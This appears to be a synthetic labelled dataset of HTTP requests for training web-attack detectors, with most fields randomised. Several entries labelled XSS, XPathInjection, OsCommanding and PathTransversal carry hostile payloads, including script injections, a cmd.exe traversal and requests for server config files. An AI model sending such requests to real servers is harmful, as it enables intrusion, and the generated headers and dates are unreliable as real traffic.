If-Range: Mon, 08 Jan 07 04:37:25 CET
Max-Forwards: 278
MIME-Version: 8.9
Pragma: ooillchd=4bguab
Proxy-Authorization: NTLM ZmRTY2xhVHQ5Y25zbzZyZXRuaWQzbHJ1ZWFpaTFuYWx0c3VpdGlyNnVkNTRl
Authorization: Basic bkVudGU6ZW90OHU=
Range: -071
Referer: http://Dyemns2.gov/nncehho/mieE.cgi
TE: trailers
Trailer: Referer
User-Agent: rrkud (muB@59aN)
UA-CPU: x86
UA-Disp: 1201,427,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 820x313
Via: 0.1 www.eg5tna9.js
Transfer-Encoding: identity
Upgrade: hoPa/4.4, Rhih/0.5
Warning: 509 32.174.131.157 "blmx" "Mon, 22 Dec 08 02:53:51 GMT"
X-Forwarded-For: 145.194.83.222
X-Serial-Number: 70476
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nhnht=allre'nb\&111t96iEN0esn=0135587057&di=daa5rprutsmocha wz9&ssnttl=eWYd_aVLjz&9tt9fl5hthlqd=317&esien=:wEse&SHsooaviw=oBZi7amNN&Algnc=ema8RIT7cew&Rue2ibth=bgsocunionf &secrcetcmhT=2919&Sksai=se&areHudl6oe=u4i+9oa]Ow/Alsi boe&eJinserttM8=3n1sfdrhvorhse0e&f4sock_streameg@49XMJ=atktf&e5sLelnsdrasOi=oGMbBd3RuC-

End - Id: 4193
Start - Id: 8114
class: Valid
GET /encemdao7eeiec/ilo@7WRvAB.7xm/Tnea0en/aepdnterTwow/tWfpKPTT/sslhtiebifQsaseR.html?wen=lNkOpp4 HTTP/1.1
Host: 10.192.70.228:80
Connection: 5r9Tm6cN
Accept: text/plain, image/gif
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: n0shko-asad
Cache-Control: no-cache
Client-ip: 96.68.165.0
Cookie: aatthlc=adyr55U
Cookie2: $Version="692"
Date: Fri, 29 Apr 05 24:52:13 CET
ETag: W/"jmGwHDRA-s.rHcX"
Expect: 100-continue
From: rresLtr@tskRf.com
If-Modified-Since: Wed, 15 Dec 04 24:28:50 UTC
If-Unmodified-Since: Sun, 01 Jun 08 21:01:52 UTC
If-Match: "VugqBqDAjuqqd_n"
If-None-Match: *
If-Range: Tue, 01 Nov 05 19:22:31 GMT
Max-Forwards: 8
MIME-Version: 5.9
Pragma: nm=B
Proxy-Authorization: ilcz elsks=s6odxaae
Authorization: rlsa oo0Ure=re68
Range: 96926-503180,-72
Referer: http://www.9emyh.net/nnutgt/3t3y/c1pNk/imiei5n.jpg
TE: trailers,deflate
Trailer: User-Agent
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 8.3; ha-Si; rv:6.4.7) Gecko/81743358
UA-CPU: 68000
UA-Disp: 4009,1990,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5707x274
Via: 9.3 www.rlob.shtml
Transfer-Encoding: gzip
Upgrade: hossa/8.6
Warning: 891 123.187.153.44 "atbuet" "Sat, 08 Sep 07 14:57:13 UTC"
X-Forwarded-For: 17.216.217.132
X-Serial-Number: 35345
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8114
Start - Id: 9464
class: Valid
GET /7bwgetlqgUnwzmrcp_/em8RMJ/ohavingZPsL/wti.php4?p2Aeuw6homew=hhihleon0d&iebaespai=msystem%3DtxEEcexeceEeeso&Oc9cpe5isD=922&Ocmsi0ilmhhens=enddeletegselectEaet2heQ&sjs=urnsronisibpa&hinLvychildWZ=sr&2i=3TrZIsEt&vmen=%2FnashavingbT%40objectaw&unSbe=Mst01lzbCm4&ataFOu2hC=21200598&sli=tIpnoeyu&sMitmszss7tg4Y=iD4u&pservicesG6QZ8EnCbetween=533768741&icaysrttt=0 HTTP/1.0
Host: www.naip.ch:05985
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252;q=0.5, euc-kr;q=0.1, big5;q=0.4, euc-kr
Accept-Encoding: *;q=0.8
Accept-Language: 6w-oiloh;q=0.0, ua0r8kC-on
Cache-Control: max-age=4
Client-ip: 144.121.224.176
Cookie: Wxp_DserviceswEX@vp5=3724090;etlG=hs' guB4i/rylinke6t
Cookie2: $Version="790"
Date: Sun, 04 May 08 11:13:11 CET
ETag: W/"XiIcXiKCk8hDam_W-6xj"
Expect: ry88tbfs
From: ieue@hoegnHqytl.be
If-Modified-Since: Mon, 02 Jun 08 23:07:42 CET
If-Unmodified-Since: Sun, 18 Sep 05 06:54:16 GMT
If-Match: *
If-None-Match: "@qrm8sNdvzOB8nF5TZ38"
If-Range: Mon, 10 May 04 01:12:02 GMT
Max-Forwards: 74
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic eXdibHRhOmJhNmg1eXQ=
Authorization: NTLM ZWZlbExzd2VTbzVkTGVFdE5JYW9haHVtcmV2Z3RsYXJvb2h1TUxFbGhl
Range: -6,7-441
Referer: /1ptOlca/zvrss6/eaehai.cfm
TE: trailers,deflate;q=0.6
Trailer: Date
User-Agent: hsgenm
UA-CPU: MIPS
UA-Disp: 073,150,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 383x664
Via: 7.7 www.notcDe.jpeg:96, FTP/3.2 163.60.58.62, tyRT2/1.9 104.108.197.122
Transfer-Encoding: 3otepa
Upgrade: osunde/3.2, hb1wa/9.8, twa/3.2, aRypee/7.6, knlu8/6.7
Warning: 579 28.101.180.151:87 "tiicEdd" "Tue, 17 May 05 01:19:10 GMT"
X-Forwarded-For: 139.44.198.239
X-Serial-Number: 010314665963317809
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9464
Start - Id: 14261
class: Valid
GET /aehdleizh/sqV.c.js?fn2=030741156 HTTP/1.0
Host: 227.216.186.72
Connection: atn7h
Accept: */*;q=0.6
Accept-Charset: hz-gb-2312;q=0.6, windows-874, iso-8859-8
Accept-Encoding: gzip, identity;q=0.6, deflate;q=0.4, gzip
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 110.246.2.165
Cookie: etrr3os=llx~1
Cookie2: $Version="960"
Date: Sat, 29 Apr 06 16:49:22 GMT
ETag: W/"9NYTjtyVsu4-K5pmEI4C"
Expect: 100-continue
From: ahix3@EtdheeDzo.cz
If-Modified-Since: Mon, 07 Aug 06 22:53:25 UTC
If-Unmodified-Since: Fri, 23 May 08 07:19:38 UTC
If-Match: "8wrM1UFP..qbn@yxr"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: yTotsr iaoreos=CaathcdY
Authorization: Digest uri=/nvnoeew/potb/4Eagh.txt
Range: -45
Referer: http://Euj1.uk/Esere9t.gz
TE: trailers,gzip;q=0.8,deflate
Trailer: Warning
User-Agent: Mozilla/3.5 (Windows; U; Win98 8.4; sm-sf; rv:9.6.4) Gecko/44493037
UA-CPU: 68000
UA-Disp: 300,717,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1753x6779
Via: 4.4 230.76.58.153
Transfer-Encoding: identity
Upgrade: mhaebe/0.0, onrt9R/9.4, nnrrrf/7.9, mietk/2.6, oia/2.6
Warning: 245 www.shn0o.jpg "rrtOe3dbt8i84ttada" "Mon, 10 Aug 09 22:29:45 GMT"
X-Forwarded-For: 252.132.26.90
X-Serial-Number: 4359426
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14261
Start - Id: 47413
class: XSS
GET /sel5ocbarri5Mab/eI/c0Swpvyg1xinonra/updatejPShqXOMxgC/sWMq5gl.IgL6nay4/In8Lwget.I7/PYV/_wbatcJnE3RK3/ecs/mK8PP7q/Hrxeor5fmt9elr3/nOUc.2E.mdb?8ecmlsm11qnnRp=476&tgt=+&4drptWeimn=6gief17o8aort67Tm&s6eluyti3=orn%3Ah%3D&cieI5ety7oemsT=577&ldwtrc4n=t&.prdocumentEsS6metc9cmd=erfhSyoygrs+a+l&mna1e=eIJ&childr_bTEsP2wb=fog&QkCX8e_7v=bstrh+eval%3F1tc%25an2oo&nmersmi=%3Cinput++++type++++%3D++++%22image++%22+dynsrc%3D+%22+++++javascript%3A+%5Balert+++%28%27zScRt%27%29%3B%5D+++%22++%3E&es=18 HTTP/1.1
Host: 55.145.46.40
Connection: ebctds
Accept: application/x-tar, audio/*, text/*;q=0.3
Accept-Charset: macintosh;q=0.5, utf-8, x-mac-arabic, x-mac-japanese;q=0.2
Accept-Encoding: deflate
Accept-Language: ut-rWcbehek, henidtnt-hehthEf
Cache-Control: no-transform
Client-ip: 71.102.4.108
Cookie: iEri=mp7iMiaran1e
Cookie2: $Version="78"
Date: Sun, 24 Sep 06 01:03:21 GMT
ETag: "DEh1qX9bUYN6ClxWCRw"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Sun, 06 Feb 05 03:26:54 GMT
If-Unmodified-Since: Sun, 02 Apr 06 24:47:01 UTC
If-Match: *
If-None-Match: "DWaCN5fv8wwLn_7mv1H"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: nuoe nldti=eta2nt
Authorization: NTLM VDdTY2VlZWJvbm5zaXlvcjdudHNjZnFOa2RzYWNsQUVhaGFpZTly
Range: -2021,0-2016
Referer: http://www.toilcm.biz/cuuhhc/idowsa1n/oovTeEni/ttda/an0atysi.php4
TE: chunked,deflate
Trailer: If-Range
User-Agent: ramyi (eWC.tKO; r6TVBaRH; usF09O4; hbfl6Gj; tyRXEGayrB)
UA-CPU: StrongARM
UA-Disp: 815,562,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1670x058
Via: FTP/6.5 12.241.100.146
Transfer-Encoding: deflate
Upgrade: s8ps/3.5, oy10/6.8
Warning: 029 www.8bsannTr.png "tiuS0ahxectarQgg" "Sat, 24 Jan 04 03:40:28 GMT"
X-Forwarded-For: 14.95.154.93
X-Serial-Number: 067686
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47413
Start - Id: 29232
class: Valid
GET /ansan3eviyio.shtml?tjoE9eaE=4eo&vhaiyhpccfee=Dnetcatr0alog&btrhlatEentTzve=-xml%28hfos5%3Flc8saT%27lm2&gDEqIi0xs=kee%3C0%3Dyh%2Bcrlikelh&aedhjeoenwt=xeogoetfttl&lixgoR7tT8ad8=%25gaenoiel&etraElalide=a%2F&euo=iLojUk1aU4&hEdd=iTeMD0aakoZ&6mPD.=8842104&jok6smt=443925&ie=336&eninlaDndodte=v&g54nxsINao=n%5Csock_streamrtzaOst&c68h=yrbdire HTTP/1.1
Host: 97.212.97.188
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dhh-0cx;q=0.7, uoa5-ehogL, le-etThj;q=0.8
Cache-Control: rd=bdeys2e
Client-ip: 189.219.81.30
Cookie: aamhie=605;taueL=hhaving
Cookie2: $Version="37"
Date: Tue, 13 Jan 04 04:11:58 GMT
ETag: W/"0g6jIwNgmq@Y4ApsNc"
Expect: 100-continue
From: pfeb@exzls2nagt.biz
If-Modified-Since: Thu, 17 Dec 09 16:43:16 UTC
If-Unmodified-Since: Wed, 27 Feb 08 12:46:44 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 17 May 06 17:42:46 GMT
Max-Forwards: 2650
MIME-Version: 8.7
Pragma: ae=rnA
Proxy-Authorization: Digest qop=deeie
Authorization: Basic bmR0dGFtdE86dG9vZW9vbmM=
Range: -2
Referer: http://eebtw.de/zl7E/rTHz/2an2Wn/daassie.js
TE: trailers
Trailer: If-Match
User-Agent: czTtwJerNi
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 200x896
Via: ttw/5.9 www.ewcMXa.shtml, 8.7 46.83.44.78
Transfer-Encoding: gzip
Upgrade: 5ds/8.0, gms/2.1, sEn/5.6, eashzN/1.6
Warning: 361 218.11.136.34 "5tnre7tafvhoea" 
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 417531274115
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29232
Start - Id: 48331
class: XPathInjection
GET /nyrhetx/ghVGeFG9oCvIXdNjOTZ/xmJeOpvjnw/vwtonnvteer/rIf/s5Fqayha-ptUG8p/KyR.bin? HTTP/1.0
Host: www.is7s.org
Connection: keep-alive
Accept: audio/*, video/*, application/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: 7270    or count(path/child::node()[position()=((i+j+k+l+1)]     | path/child::*()[position()=(k+1)])=1     or 4319=
Cache-Control: no-cache
Client-ip: 140.182.82.134
Cookie: jh=bodyoeF6z8neadminld;uttNxbdtrhcgs=O3wgetg rdor
Cookie2: $Version="474"
Date: Sun, 18 Jan 09 03:47:10 GMT
ETag: W/"_-ZxNNysTe29xaV7"
Expect: 100-continue
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Sun, 11 May 08 21:52:41 GMT
If-Unmodified-Since: Sun, 13 Feb 05 16:54:05 CET
If-Match: "WGP@QVTfmxu76Hi"
If-None-Match: *
If-Range: Tue, 20 Nov 07 05:08:30 GMT
Max-Forwards: 1088
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: dneDtg c5itec=enfiila
Authorization: NTLM c2lpbmRlaGdvdXlpb29vZXBudG9vbHN3YmZubm9jZXpvaTJzYXc4aA==
Range: 8313-,-86247,250-55725
Referer: /hesUEm/aENr/onpitis/oeceaT/dudo.css
TE: trailers
Trailer: If-Modified-Since
User-Agent: i8yyc4Ir http://www.zecywjh.org
UA-CPU: Sparc
UA-Disp: 202,739,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 433x249
Via: hmlYli/8.3 117.32.197.73, FTP/2.7 225.36.72.236
Transfer-Encoding: gzip
Upgrade: eta/7.4, auRa/8.4
Warning: 922 www.shedURse.gif "43Mra" 
X-Forwarded-For: 190.33.188.59
X-Serial-Number: 278748120266538
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48331
Start - Id: 36610
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 97.91.109.16
Connection: haoiELo
Accept: text/*;q=0.5, video/*;q=0.2
Accept-Charset: euc-tw;q=0.0, macintosh
Accept-Encoding: *
Accept-Language: *
Cache-Control: s3='l'
Client-ip: 34.3.142.249
Cookie: optR@lTX6Bz=99020;4b2W7=~ylo<oyieto+t)n;Ze79e0okemis=3
Cookie2: $Version="9"
Date: Tue, 16 Aug 05 13:03:48 CET
ETag: W/"EP-i@KNZB-cwSUgL"
Expect: 100-continue
From: mxpilln@asjinobbr.ch
If-Modified-Since: Mon, 22 Feb 10 08:55:45 GMT
If-Unmodified-Since: Mon, 08 Feb 10 10:00:09 CET
If-Match: *
If-None-Match: *
If-Range: "jNsbGbCNDIlxi4gzig"
Max-Forwards: 93
MIME-Version: 1.9
Pragma: eytR=9
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: sbRa nf1on=0nhhoqi
Range: 017729-
Referer: http://www.nRqys.org/3nwrat3/mmecge/tetob/itnnm.avi
TE: trailers
Trailer: TE
User-Agent: Mozilla/8.8 (compatible; MSIE 0.1; Open BSD i386; htE1L)
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: HTTP/4.5 www.lu6s.css, 2.7 68.148.171.99, 5.2 138.124.168.243
Transfer-Encoding: compress
Upgrade: hr8so/4.0, h23/1.4, yud3rE/6.4, xdnou/0.4, bIe4Er/8.9
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36610
Start - Id: 47906
class: XSS
GET /eXWUTC/ion7qrfi9ESr1taas/sgpZxx3@mv8fxr-@/ClBvbTuTRTXpositionyD0/exT.asmx?Rw3B61or_positionZ_=oail%22++++style%3Dleft%3Aexpression%28alert+++%28%22++a79.ei+%22%29%29+++alt+%3D%22&diaedeqI=cas5wtsOo%24ths&8u=samte%29emhe&reAhasnia1rzet=3144379&Duinputophpvarr665=ye-bhomeh5d+%28e&rmvJZonnode=s%404e3PyW6PXL&xuesea=TbCcmdmlz%29g%3Arlikei&tvayNE=c5r7e HTTP/1.0
Host: www.arwuooa.com
Connection: keep-alive
Accept: application/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 9m-etlOnsoh;q=0.7, oeg-m, chs7h-pRreOD
Cache-Control: pewO=s
Client-ip: 51.142.233.184
Cookie: oRcEaemmgoeeo=9501;MoluRpB=tuP5;o8neia9lpere=dtNals<tpoyamixtau;eDhtE=yr;2eueoHhoIhoetwe=595953;ks9rse1b=Pbgsounda>e echoto2tr
Cookie2: $Version="38"
Date: Tue, 26 Feb 08 15:14:03 GMT
ETag: "ifdVZPaP60cBTA8HNdjF"
Expect: nlrwmq
From: rigu@deao.net
If-Modified-Since: Sat, 21 Mar 09 13:22:19 UTC
If-Unmodified-Since: Tue, 04 May 10 22:23:07 GMT
If-Match: *
If-None-Match: "H9klOPmFb-OgsSNjL"
If-Range: Sun, 18 Apr 10 18:08:04 CET
Max-Forwards: 4913
MIME-Version: 8.4
Pragma: ai=3cat7aiq
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest realm
Range: 0-,-42414
Referer: http://www.enhnrta.biz/tkai/asepnfc.pdf
TE: trailers
Trailer: Authorization
User-Agent: aKnRfFl3 http://www.uhmLAe.be
UA-CPU: x86
UA-Disp: 213,2027,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 229x467
Via: 1.0 105.74.177.221, 5.5 www.inwm.shtml, FTP/7.0 www.eriooa.js
Transfer-Encoding: deflate
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47906
Start - Id: 36317
class: PathTransversal
GET /srzeiigei7ee/bYPwinnttR-_Randps8Z/59T46eidklz/0i/jnEs/pnsh7/ilyk26DnY2l0cuFfR/eKg-LssO/@OLAXAtxp_i/1aGb-sock_stream2s/4sdwhereO-/3miguodsirniahts.asmx?giBouaOasecpo5g=xe&6ysyrattaBt=%2Fetc%2Fhttpd%2Fhttpd.conf&0aTXK=eealhittte4n&ieXuttet=+%5D&e7wlyd=e6so%3Direlswp-psd%5Baw&od=dd%24retc+&lal7hx=1ebodyscript&nbdeeh=tccmdfxotlesitmasimgxd&vCL_6SWAhb=oiaryertoGAhsmaxe1&qx1m8uI19=boot.ini9execfrss%26e%3CnaihE&2ylDfM5sKA-n=1399943&stcaslt=I5oat HTTP/1.1
Host: 133.236.87.89
Connection: close
Accept: image/gif
Accept-Charset: x-mac-chinesesimp;q=0.3, windows-1257, iso-2022-jp;q=0.8, x-mac-greek, windows-1258
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=5
Client-ip: 204.44.253.203
Cookie: snsu3ieles4i=086;ylhna7pri=erh-yUqaxVzQ
Cookie2: $Version="628"
Date: Fri, 01 Jan 10 11:33:02 CET
ETag: W/"XVnSSkhMGncEq258"
Expect: 4soo
From: 5ygo@eiccrasaq.org
If-Modified-Since: Wed, 02 Apr 08 12:47:33 CET
If-Unmodified-Since: Sun, 13 Feb 05 11:42:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 040
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic aTFhdGw6bmFhc0ZIZWE=
Authorization: ssorm EAiO=noelasNi
Range: 70-
Referer: /nL7nbid.tar.gz
TE: trailers,trailers,deflate;q=0.1
Trailer: User-Agent
User-Agent: Mozilla/0.5 (Machintosh; U; PPC 5.7; 4o-hE; rv:1.8.6) Gecko/30176234
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 645x5981
Via: HTTP/7.3 www.noq5li.htm, FTP/2.7 www.ebelb.tiff, 6.4 www.ehrtqwn.css:858
Transfer-Encoding: identity
Upgrade: saanei/2.6
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 10989646571343616
----: -----------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36317
Start - Id: 12298
class: Valid
GET /KPevalOxFWnz-Hopenmocha3./DoiAhnoeyrstnd43Zd/5gmO2IEmKakrOl5yE/execo-O/eQsvG0kvhi@DNqxl@2C/fR.nd5@VYhAPfU/R2StuDAc3ws/tzM-LXWP-/onLD9lhswS.pl?eotagoNjer=40827766&te=04048&UinsertI3AncYrG=tRandrp%3Amsfin%27&entmsTcdc=25&yIepsMfr0wpt=794081 HTTP/1.0
Host: 48.70.232.36
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: l7-ksimxogr;q=0.3, tun-v;q=0.3
Cache-Control: max-age=8452
Client-ip: 49.9.133.115
Cookie: Iaobzndf=iih;9gqSea58rl=tKqVJgZZA8;O9nyituvtilk=6;d0nret=60;naedHnuhZrs=reoeslnooNuo5hare
Cookie2: $Version="74"
Date: Mon, 13 Jul 09 17:35:55 UTC
ETag: "GwBN0nMB2QWnAOLX"
Expect: 100-continue
From: Stdteeh@0aeh.it
If-Modified-Since: Sun, 21 May 06 16:16:28 CET
If-Unmodified-Since: Wed, 19 Dec 07 24:26:17 UTC
If-Match: *
If-None-Match: "1WXYUCyYBNYTu3y0r1O"
If-Range: Sat, 27 Oct 07 21:41:28 GMT
Max-Forwards: 40
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: nat0lr uooaajy1=gemieovr
Authorization: 1ldmf7 ojEt=s2nd
Range: 063231-
Referer: /Mras/tEreR/osne.gif
TE: deflate;q=0.6,trailers
Trailer: Host
User-Agent: sattam83om/2.4
UA-CPU: 68000
UA-Disp: 1340,7925,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 981x039
Via: FTP/6.3 207.123.32.217, HTTP/5.7 172.64.123.101, 9.6 6.89.3.252
Transfer-Encoding: compress
Upgrade: iera/5.2, o29/7.6
Warning: 710 44.94.63.159 "Dh6webSt4" 
X-Forwarded-For: 175.249.76.8
X-Serial-Number: 61893291117945630
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12298
Start - Id: 26979
class: Valid
GET /gK.5q8n9j/otfsehsjoe/r.3jTr/uVDt.8miqx6kC3HOMd/e_o.jAReV_DHnJ_/4y1j_BpBdropkG/iSvn8U2jN9A4aRoXv.Pr.cfm?sgroup byV_MN=409&nei=71&raeu=23123&V09W=675168&tsrdkii=sg2amfxn0atith7&reonE=u+0tw%27sumthii4&sisibtoosebsdrt=e6pgtli&rd2ta=609913&s0WzmochaN=oqs8ylr8&_DekAdqJia=7uea&eaiit6olibvj1=tHMTeiefia HTTP/1.1
Host: www.iaUn9o.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: min-fresh=49591
Client-ip: 128.148.23.146
Cookie: hooM7=I LoizaAa +g=ldSoo;asnvN0n6ttsjrh=s3OdeIympm;oscdiodd5Tt=(%ie2
Cookie2: $Version="21"
Date: Tue, 04 Dec 07 11:05:07 CET
ETag: W/"ZRNduEirGmna_BUVr"
Expect: ei1a
From: eanp0se@1atltaa.biz
If-Modified-Since: Mon, 22 Feb 10 13:58:41 GMT
If-Unmodified-Since: Thu, 05 Mar 09 10:11:50 CET
If-Match: "M0QsBbLnB6zW2p1@Y"
If-None-Match: "nbx0Bx.F7VEQ4J1vGq"
If-Range: Thu, 23 Apr 09 21:25:11 CET
Max-Forwards: 3014
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic MmlUaTpnZWUwZA==
Authorization: rfhn sOrrlnn=naksC
Range: 5-,0419-,7123-1341
Referer: http://enest.uk/TXseLoo/exwme/slhuPwnx/koorr/tyni8m.rar
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.8 (compatible; Konqueror/4.1; Solaris; r9ddr; gmnasu; iagycf)
UA-CPU: Sparc
UA-Disp: 181,245,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6546x3443
Via: 5.5 58.242.170.132, HTTP/3.6 www.emEeoaNy.gif
Transfer-Encoding: gzip
Upgrade: caeth/1.6, lnOnre/5.4, bKelfr/1.3
Warning: 634 119.210.230.98 "Etrefi" "Thu, 26 Oct 06 17:47:14 CET"
X-Forwarded-For: 158.178.215.164
X-Serial-Number: 781010344531
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26979
Start - Id: 7514
class: Valid
PUT /dW1sxp_/s9W0Ehttp0HZ/nUh4kUgNfEj_/2ioboot.iniH2U/n36QSmwOCSi@/A2pr5eAawET4dse/tWwgwqRY_yh/EortdX.vzaVcrF/ncYT/9f.exe? HTTP/1.0
Content-Length: 185
Content-Language: 1hdfiR,t
Content-Encoding: compress
Content-Location: /yns9nn/tcd6ro/o8et/ocsa/ncneen.cgi
Content-MD5: dG9ocjNvaWpjN25lcnJlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Feb 10 16:31:22 CET
Last-Modified: Fri, 14 Oct 05 05:26:05 GMT
Host: www.eiheoT.gov:47
Connection: close
Accept: image/jpeg;q=0.2, video/*, video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: 7n-Ke;q=0.1, b-97Ltcsc;q=0.1, i-heo8fr;q=0.7
Cache-Control: no-cache
Client-ip: 203.218.129.151
Cookie: tiwdo4naeoo9sic=oYMEYHDyhcc
Cookie2: $Version="10"
Date: Wed, 21 Sep 05 18:35:51 CET
ETag: "IDVxJ1PhzWykiT.iDKWa"
Expect: 100-continue
From: nx7o@olnt1.uk
If-Modified-Since: Thu, 21 Apr 05 06:52:25 UTC
If-Unmodified-Since: Thu, 04 May 06 16:58:58 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Sep 04 13:19:24 UTC
Max-Forwards: 38
MIME-Version: 7.9
Pragma: ygmn=z
Proxy-Authorization: NTLM ZXFpcmZOMHNydG9yZWU3TmNzcm90ZmhlYWNsd0VlYWhlZnBuOGdlamhvTnQw
Authorization: Digest realm
Range: -30,4332-,1864-
Referer: http://anoN.biz/tcgc/br1bt8st/iugeal.pl
TE: trailers,gzip;q=0.7
Trailer: Trailer
User-Agent: ktelrsuerae
UA-CPU: MIPS
UA-Disp: 8435,1661,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 656x8647
Via: 8.3 152.192.139.222
Transfer-Encoding: identity
Upgrade: re0dg/7.1
Warning: 753 29.165.234.131 "roo8AnvstearSwmdsl" "Tue, 18 Nov 08 10:21:34 GMT"
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 458445929506444
----: ----------------------
~~~~~: ~~~~~~~~~~~

xFl8Euhttp9C3.T=zneSi@lti9o/ sIidelus&oan=pPXG@0k7AG_&S2gvsaTuoo5xedc=6889&guVFt76CK=1521951&obMmtlx=ohftirah&iuaembws=eS@d9ioVH0lL&cehglkposn=wDoss3u3&LuOcltoa7de89=eepuwfer9eh

End - Id: 7514
Start - Id: 13487
class: Valid
GET /rcEJ0J4nopAuHq/cau/zO6t0CquOZ27wF8MK.swf? HTTP/1.1
Host: 85.117.13.3
Connection: keep-alive
Accept: text/*;q=0.8, audio/*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate, identity, identity;q=0.7, compress;q=0.4, gzip
Accept-Language: ir6aasie-8Mo9bt, 8mul-o;q=0.1, Yaa-M, ei94pgo-osponial, tHcl-new6
Cache-Control: min-fresh=288
Client-ip: 115.218.99.104
Cookie: otw=506915249;yu=ten9&tol hjke
Cookie2: $Version="69"
Date: Tue, 27 Jan 09 20:29:25 UTC
ETag: W/"6e9FnU-XXvJ3yP6f3Rpa"
Expect: 100-continue
From: iaeuease@fasecroo.st
If-Modified-Since: Wed, 17 Mar 04 11:31:12 CET
If-Unmodified-Since: Thu, 26 Apr 07 02:25:02 GMT
If-Match: "sVDvjnB7qf0cH_v87h"
If-None-Match: *
If-Range: "P1elfQUvMIXzjnL54"
Max-Forwards: 9
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic Mm9qdDpUc2Vkam5l
Authorization: Digest qop=auth-int
Range: 99-590
Referer: /edeaha/eh1s1n/aaai/2nlto.js
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: igOYbn http://www.ftmao3sn.org
UA-CPU: x86
UA-Disp: 908,0638,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 912x6854
Via: 6.2 243.225.205.2, HTTP/8.1 www.c5ot2.htm, FTP/6.2 47.5.69.123
Transfer-Encoding: gzip
Upgrade: odo/1.8
